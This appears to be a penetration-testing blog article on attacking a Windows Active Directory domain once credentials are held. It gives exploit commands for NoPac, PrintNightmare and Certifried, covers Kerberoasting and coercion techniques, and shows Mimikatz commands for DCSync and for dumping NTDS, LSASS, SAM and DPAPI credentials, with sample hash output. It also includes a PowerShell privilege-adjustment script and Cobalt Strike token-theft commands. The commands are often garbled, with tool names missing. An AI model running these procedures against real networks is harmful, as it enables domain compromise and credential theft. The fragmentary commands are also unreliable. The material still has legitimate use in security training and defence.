Pwning the Domain: With Credentials

Pwning the Domain: With Credentials

Read In This Article

Domain Account

After getting access to a domain account, there are a variety of things that can be done including but not 

limited to: domain enumeration, Kerberoasting, coercion, etc.


There are many options for enumerating the domain once you have an account:

  •  BloodHound
  •  PowerView
  •  SharpView
  • ..


BloodHound is a go-to tool when it comes to enumeration in the domain realm.

BloodHound logo

It uses graph theory to reveal relationships between objects in the domain realms and find complex attack paths that may otherwise be impossible or hard to find. It’s a good option for both the attackers, to abuse those paths, and for the defenders, to eliminate them.

BloodHound analyzes data and then shows a graph based on that data. To get the needed data we need data collection tools like SharpHound and/or AzureHound.

Usage guide

We’ll leave the installation to you:

In summary you need Java, Neo4j and finally the BloodHound tool itself. But do note that you have to install Neo4j version 4 because the newer version, 5, has some performance issues.
For this scenario we’ll be using SharpHound collector and you can get it from 

By just running it with no parameters, we still can get a lot info:


For the cheatsheet you can refer to the image below:

We’ll just go with no parameters and use the data it collected:

Then we simply need to upload it to where BloodHound is installed and drag the zip file into BloodHound GUI and wait for it to upload.

You’ll probably get a lot more data since the lab this is tested on is installed recently. You can perform queries that are implemented right into the BloodHound itself or write other queries yourself.


PowerView is part of the PowerSploit repository and is used for enumeration once inside the domain realm.

It includes many functions that are implemented using Win32 API and Powershell AD hooks.

You can get PowerView from this link.

Running it in the target system is as easy as uploading it there and importing it in Powershell:

Import-Module .\PowerView.ps1

There are many commands you can try out which are documented in the PowerSploit website.

We’ll be using some of the common ones here.

  •  Get-Domain: returns the domain object for the current (or specified) domain
  •  Get-DomainUser: return all users or specific user objects in AD

You can chain the results with select to only select the fields you want to see.

  •  Get-DomainComputer: returns all computers or specific computer objects in AD
  •  Get-DomainGroup: return all groups or specific group objects in AD
  • Get-DomainGPO: returns all GPOs or specific GPO objects in AD
  • Get-NetShare: returns open shares on the local (or a remote) machine


When you have credentials, it means you authenticate against Kerberos where you provide your NTHash in AS_REQ packet and receive a TGT(Ticket Granting Ticket) through AS_REP packet. Then you can use that TGT to send a TGS_REQ to get a ST(Service Ticket) to access a specific service via TGS_REP packet.

This is where it gets interesting, that ST you got from the server is encrypted with the service account’s NTHash, meaning when you get hold of a ST, you can crack it and get back the service account’s password!

That’s what Kerberoasting is all about.

With credentials

Once you have a username and password you can request STs for services that have their SPN(Service Principal Name) set: -request -dc-ip <ip> <domain>/<user>:<password>

Once you have the hash, you can crack it using hashcat.

With username

You can also request a ST using AS_REQ packet instead of TGS_REQ when you have a ASREPRoastable user and service SPNs to target. -no-preauth “bobby” -usersfile “services.txt” -dc-host “DC_IP_or_HOST” “DOMAIN.LOCAL”/


If a user has the rights to add a SPN to another user, It’s possible to make the other user vulnerable to Keberoasting!


Coercion is about forcing/redirecting authentications. And there are many ways to do it and Microsoft doesn’t really see it as a vulnerability because it’s pretty common in the domain realm to relay authentication.


PrinterBug triggers a RPC call to make the victim’s Spooler service authenticate to a target of the attacker’s choosing. And it has no fix!

First you should check to see whether Spooler service is available or not using Impacket’s

Then you can easily use to coerce authentication to a target of your choosing:


MS-FSRVP is used to create shadow copies of remote hosts. The requirement for this coercion method is that the File Server VSS Agent Service must be installed on the target system. Note that this is patched in update kb5015527: -d “domain” -u “user” -p “password” LISTENER TARGET


MS-DFSNM provides a RPC interface for administering DFS: -d “domain” -u “user” -p “password” LISTENER TARGET

SMB share

If you have access to a SMB share, you can put a variety of files in there to coerce authentication your way! You can put .url,.scf,..


PrivExchange Vulnerability

The PrivExchange attack involves leveraging vulnerabilities in Microsoft Exchange servers to escalate privileges and ultimately gain domain administrator access. Below are the steps involved in conducting a PrivExchange attack:

  1. Installation of Requirements:
    • Ensure impacket is installed. You can install it from pip with pip install impacket, but using the latest version from GitHub is recommended.
  2. Execute
    • Use the tool to log in to Exchange Web Services and subscribe to push notifications. This action prompts Exchange to connect back to the attacker and authenticate as the system.
  3. Execute (Optional):
    • The module can be used with to perform the attack without credentials.
    • Modify the attacker URL in to point to the attacker’s server where ntlmrelayx will run.
    • Clone the impacket repository from GitHub (git clone and copy the file into the /impacket/impacket/examples/ntlmrelayx/attacks/ directory.
    • Install the modified version of impacket with pip install . --upgrade or pip install -e ..
       _______ Pwning the Domain _______
       /                |                  \
 PrivExchange       Domain Controller    Gain Domain
    Attack          Compromise         Administrator
      |                 |                      |
  Exploit           Exploits             Credential
      |                / | \               Harvesting
 Vulnerabilities    /  |  \                Techniques
       |            /   |   \
Microsoft Exchange Enumeration | Persistence
Server Vulnerability            |
                         Social Engineering


SamAccountName/NoPac Attack

The SamAccountName/NoPac attack exploits vulnerabilities CVE-2021-42278 and CVE-2021-42287 to impersonate a Domain Admin from a standard domain user. Below are the key steps and commands involved in executing this attack:

  1. Installation of Requirements:
    • Ensure the necessary tools and libraries are installed, including Impacket. You can install Impacket from pip with pip install impacket, or use the latest version from GitHub.
  2. Execute
    • Use the script to perform the attack, providing the domain/username and password as parameters.
    • Example:
python'1qaz@WSX' -dc-ip

Auto Get Shell:

  • Optionally, use the --shell parameter to automatically drop a shell via smbexec after successful exploitation.
  • Example:
python'1qaz@WSX' -dc-ip -dc-host lab2012 -shell --impersonate administrator

Dump Hash:

  • Use the -dump parameter to dump hashes after successful exploitation.
  • Example:
python'1qaz@WSX' -dc-ip -dc-host lab2012 --impersonate administrator -dump


  • Utilize the script to scan for vulnerable systems within the domain.
  • Example:
python'1qaz@WSX' -dc-ip

Additional Methods:

  • Optionally, you can explore additional methods for exploiting vulnerabilities, such as finding computers that can be modified by the current user or identifying CreateChild accounts.
  • Examples:
AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domain\user  -recmute
AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute


One such vulnerability, known as PrintNightmare (CVE-2021-1675), presents a critical remote code execution and local privilege escalation (LPE) threat. Exploiting this vulnerability can lead to unauthorized access and control over the domain, making it a prime target for attackers.

PrintNightmare enables attackers to execute arbitrary code with SYSTEM privileges on a target system. Below is a PowerShell script that leverages PrintNightmare to perform local privilege escalation:

# Import the PowerShell module
Import-Module .\cve-2021-1675.ps1

# Add a new user to the local administrators group by default
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default

# Supply a custom DLL payload
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure" 


  • The script embeds a Base64-encoded GZIPped payload for a custom DLL, allowing for local privilege escalation.
  • It does not require remote RPC or SMB access, as it operates solely within the functions of Print Spooler.
  • Methods from PowerSploit/PowerUp are utilized for reflective access to the Win32 APIs.
  • The script automatically determines the appropriate DLL path without iterating through all printer drivers.
          _______ Pwning the Domain _______
         /                |                 \
 PrintNightmare       Domain Controller    Gain Domain
    Vulnerability     Compromise         Administrator
         |                |                      |
    Exploitation      Exploits             Credential
         |               / | \               Harvesting
     Vulnerabilities  /  |  \                Techniques
         |           /   |   \
   CVE-2021-1675   /     |     \
                  /      |      \
            PowerShell  Python   C++


One such vulnerability, Certifried (CVE-2022-26923), provides attackers with the ability to abuse certificate-related functionality to escalate privileges and potentially compromise the domain. Below are the steps to replicate this vulnerability manually, along with a Python tool called Certifried that simplifies the process.

Certifried Exploitation

Certifried simplifies the process of exploiting CVE-2022-26923. However, here are the manual steps to replicate the vulnerability:

  1. Request Certificate Manually:
    • Add the computer and update necessary attributes.
python3'Password1' -dc-ip

Recover NTLM Hash:

  • Request the certificate manually.
python3'Password1' -dc-ip -use-ldap

Proceed with SecretsDump:

  • After obtaining the NTLM hash, proceed with dumping secrets.
python3'Password1' -dc-ip -computer-name 'ControlledComputer' -computer-pass 'Password123' -use-ldap -dump

Modify Computer Account:

  • In case you obtain a machine account hash, modify the computer account.
python3\$@ -hashes :0e3ae07798e1bc9e02b049a795a7e69f


          _______ Pwning the Domain _______
         /                |                 \
    Certifried       Domain Controller    Gain Domain
   Vulnerability    Compromise         Administrator
         |                |                      |
    Exploitation      Exploits             Credential
         |               / | \               Harvesting
     Vulnerabilities  /  |  \                Techniques
         |           /   |   \
  CVE-2022-26923   /     |     \
                  /      |      \
               Python   Manual   LDAP

Domain Admin


Dumping the NTDS database is a critical step in gaining access to sensitive information within a Windows domain. This can be accomplished through various means, one of which involves the usage of popular penetration testing tools like Mimikatz. Below are the steps to dump the NTDS database:

  1. Elevate Privileges: Ensure that you have obtained domain administrator credentials or equivalent privileges to execute the necessary commands.
  2. Download Mimikatz: Obtain the latest version of Mimikatz or compile it from source if needed.
  3. Launch Mimikatz: Run Mimikatz with administrative privileges on a compromised system within the domain.
  4. Execute Commands:

Extract NTDS Information: Once you’ve obtained the necessary privileges, use Mimikatz to extract NTDS information by running the following commands:

lsadump::lsa /inject /name:ntds
lsadump::lsa /inject /name:ntds /system:SYSTEM

Dump NTDS Database: Finally, dump the NTDS database using Mimikatz:

lsadump::dcsync /domain:<DOMAIN_NAME> /all /csv


             _______ Pwning the Domain _______
           /                |                  \
     Dump NTDS         Domain Controller       Gain Domain
     Database             Compromise          Administrator
        |                     |                      |
     Mimikatz               Exploits             Credential
        |                    / | \               Harvesting
    Privilege              /  |  \                Techniques
     Escalation           /   |   \
     Techniques     Enumeration | Persistence
                           Social Engineering


DCSync is a feature of the Active Directory replication protocol that allows domain controllers to request password data from other domain controllers. However, this feature can be abused by attackers who have obtained sufficient privileges to impersonate a domain controller and retrieve sensitive information, including password hashes, from the AD database.

Below are the steps involved in conducting a DCSync attack:

  1. Elevate Privileges: Ensure that you have obtained domain administrator credentials or equivalent privileges to execute the necessary commands.
  2. Impersonate a Domain Controller: Utilize tools like Mimikatz to impersonate a domain controller and request password data.
  3. Execute Commands:
lsadump::dcsync /domain:<DOMAIN_NAME> /user:<USERNAME>
  1. Retrieve Password Data: The above command requests the password data for the specified user from the domain controller’s AD database.
  2. Extract Hashes: Once the DCSync command is executed successfully, the attacker can extract password hashes for the targeted user.
           _______ Pwning the Domain _______
           /                |                  \
      DCSync              Domain Controller    Gain Domain
      Attack              Compromise         Administrator
        |                     |                      |
     Mimikatz               Exploits             Credential
        |                    / | \               Harvesting
    Privilege              /  |  \                Techniques
     Escalation           /   |   \
     Techniques     Enumeration | Persistence
                           Social Engineering

Extract Credentials


Local Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system.” Basically, it stores the local usernames and passwords/hashes in it. So dumping this is one of the common things adversary and red teamers do. Although there are several ways to dump the lsass , but we will keep it limited to mimikatz.

if we have got access with credentials to domain controller or any other machine with

local administrative rights, we can run the mimikatz with following command to dump

the lsass process and extract NTLM hashes from it. The clear text password

dumping is possible on older version of windows where the wdigest


than-a-hash/ ) is used. But the newer version of windows have wdigest disabled, so

we get NTLM hashes only.



The above command dump all the hashes from LSASS including the user accounts that were not dumped in logon passwords before.

Do remember , there are several ways to dump the hashes from the lsass process , not limited to one, like we can use task manager to dump the lsass memory file, we can use procdump , we can use msv module of mimikatz , etc.


The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam Mimikatz module. If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.




The above commands dumps the local Security Account Manager (SAM) NT hashes. It can operate directly on the target system, or offline with registry hives backups (for SAM and SYSTEM ).

mimikatz # lsadump::sam

Domain : DC

SysKey : 7852ea75b3b8c4093fbda3f618a045bb

Local SID : S-1-5-21-97532702-2134717100-614679475

SAMKey : 7a87c9ff42815d7d1cead9fe84db22ba

User :
NTLM: 4d01f91984530f183381bdf5f0605f63
User :

RID	: 000001f7 (503)

User : DefaultAccount

DPAPI Dump/Decryption

The Data Protection API (DPAPI) is a component built into Windows that provides a means for encrypting and decrypting data “blobs”. It uses cryptographic keys that are tied to either a specific user or computer and allows both native Windows functionality and third-party applications to protect/unprotect data transparently to the user.

DPAPI is used by the Windows Credential Manager to store saved secrets such as RDP credentials, and by third-party applications like Google Chrome to store website credentials.

The way the Windows Credential Manager works on basis of “Vaults” and “Credentials” . A “vault” essentially holds records of encrypted credentials and a reference to the encrypted blobs. Windows has two vaults: Web Credentials (for storing browser credentials) and Windows Credentials (for storing credentials saved by mstsc, etc). A “credential” is the actual encrypted credential blob. we can use the folloiwng command to list the valut

mimikatz vault::list

Now we have Credential Files , This files are protected and could be located in:

dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\

dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden


Get-ChildItem -Hidden


Get credentials info using mimikatz dpapi::cred , in the response you can find interesting info such as the encrypted data and the guidMasterKey. The master keys are stored in the users’ roaming “Protect” directory. But they’re also encrypted.

mimikatz dpapi::cred /in:C:\Users\




guidMasterKey : {bfc5090d-22fe-4058-8953-47f6882f549e} [...]

pbData : b8f619[...snip...]b493fe [..]

Now there are two ways to dump the master key, but here we will show you the first method , i.e if the master keys are cached in LSASS. It will not be in the cache if the user has not recently accessed/decrypted the credential.

mimikatz !sekurlsa::dpapi

Authentication Id :
0 ; 1075454 (00000000:001068fe)
: RemoteInteractive from 2
User Name
: bfarmer
Logon Server
: DC-2
Logon Time
: 9/6/2022 9:09:54 AM
: S-1-5-21-569305411-121244042-2357301523-1104


:  {bfc5090d-22fe-4058-8953-47f6882f549e}
* Time

:  9/6/2022 11:27:44 AM

MasterKey : 8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85f c8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
sha1(key) :  897f7bf129e6a898ff4e20e9789009d5385be1f3

as we can see we have the GUID match from the above both command , so that is our master key. Now we can use mimikatz module dpapi::cred with the appropiate /masterkey to decrypt and get a plain text password.

dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>

Token Manipulation

Adjust token privileges

Widows operating system follows the concept of ‘Token Privileges’. Now these aren’t just privileges that Windows gives you to make you feel better – those are Token Compliments. Token Privileges are aspects of the things your user account can do, but you often don’t need that power enabled by default. For example, anybody can restart a computer, but windows doesn’t enable that privilege by default:

do remember , domain group policy overrides the privileges and access we set on local system

if we want to enable or disable token privileges , PowerShell doesn’t ship a cmdlet to

adjust token privileges by default. There are two ways to adjust the token privileges

either by using windows API called AdjustTokenPrivileges


securitybaseapi-adjusttokenprivileges ).

or we can use the following PowerShell script that uses pinvoke to enable / disables the all/any privilges.

param(	## The privilege to adjust. This set is taken from



"SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeBackupPrivilege",

"SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeCreatePagefilePrivilege",

"SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege", "SeCreateTokenPrivilege",

"SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege",

"SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege",

"SeLockMemoryPrivilege", "SeMachineAccountPrivilege", "SeManageVolumePrivilege",

"SeProfileSingleProcessPrivilege", "SeRelabelPrivilege", "SeRemoteShutdownPrivilege",

"SeRestorePrivilege", "SeSecurityPrivilege", "SeShutdownPrivilege", "SeSyncAgentPrivilege",

"SeSystemEnvironmentPrivilege", "SeSystemProfilePrivilege", "SeSystemtimePrivilege",

"SeTakeOwnershipPrivilege", "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege",

"SeUndockPrivilege", "SeUnsolicitedInputPrivilege")] $Privilege,

The process on which to adjust the privilege. Defaults to the current process.
$ProcessId = $pid,

Switch to disable the privilege, rather than enable it. [Switch] $Disable


Taken from P/Invoke.NET with minor adjustments. $definition = @'
using System;

using System.Runtime.InteropServices; public class AdjPriv


[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]

internal static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,

ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);

[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)] internal static extern bool OpenProcessToken(IntPtr h, int acc, ref

IntPtr phtok);

[DllImport("advapi32.dll", SetLastError = true)]

internal static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);

[StructLayout(LayoutKind.Sequential, Pack = 1)] internal struct TokPriv1Luid


public int Count;

public long Luid;

public int Attr;


internal const int SE_PRIVILEGE_ENABLED = 0x00000002; internal const int SE_PRIVILEGE_DISABLED = 0x00000000; internal const int TOKEN_QUERY = 0x00000008;

internal const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;

public static bool EnablePrivilege(long processHandle, string privilege, bool disable)


bool retVal;

TokPriv1Luid tp;

IntPtr hproc = new IntPtr(processHandle); IntPtr htok = IntPtr.Zero;

retVal = OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ref htok);

tp.Count = 1;

tp.Luid = 0;









retVal = LookupPrivilegeValue(null, privilege, ref tp.Luid); retVal = AdjustTokenPrivileges(htok, false, ref tp, 0,

IntPtr.Zero, IntPtr.Zero);

return retVal;




$processHandle = (Get-Process -id $ProcessId).Handle $type = Add-Type $definition -PassThru

$type[0]::EnablePrivilege($processHandle, $Privilege, $Disable)

Token Impersonation

Here an adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can than be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user’s security context, or with SetThreatToken to assign the impersonated token a thread. This is useful for when the target user has a non-network logon session on the system.

To use the impersonation , we can use incognito from meterpreter or steal_token or make_token from the Cobalt strike.

Incognito can be loaded into a Meterpreter session by using the “use incognito” command, and available tokens can be listed with “list_tokens -u”. if we have any impersonation token available , we can use it like so :


also in cobalt strike , if we know the plaintext password of the user we can create a token for that user to abuse it like so :

beacon> make_token DEV\suryadevsingh Qwerty123

Impersonated DEV\jking (netonly) beacon> remote-exec winrm <ip/doamin> whoami dev\suryadevsingh

or we can steal the token from the PID , if we are having higher privileges of local administrator :

beacon> steal_token 5536

Recovering default privileges set of Network Service/Local Service accounts / Bypassing Restricted set of privileges.

On Windows, some services executed as LOCAL SERVICE or NETWORK SERVICE are configured to run with a restricted set of privileges. Therefore, even if the service is compromised, you won’t get the golden impersonation privileges, and privilege

escalation should be more complicated. However, when you create

a scheduled task, the new process created by the Task Scheduler Service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulations, you can spawn a new process with all the missing privileges.

We can utilize the tool called FullPowers to achieve this. This tool should be


c:\TOOLS>FullPowers -c "powershell -ep Bypass"

Successfully created scheduled task. PID=9028

CreateProcessAsUser() OK

Windows PowerShell

Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell

PS C:\WINDOWS\system32> Get-ExecutionPolicy Bypass

Security Researchers

Resources recovering default privileges set of network service/local service accounts

Free Consultation

For a Free Consultation And Analysis Of Your Business, Please Fill Out The Opposite Form, Our Team Will Contact You As Soon As Possible.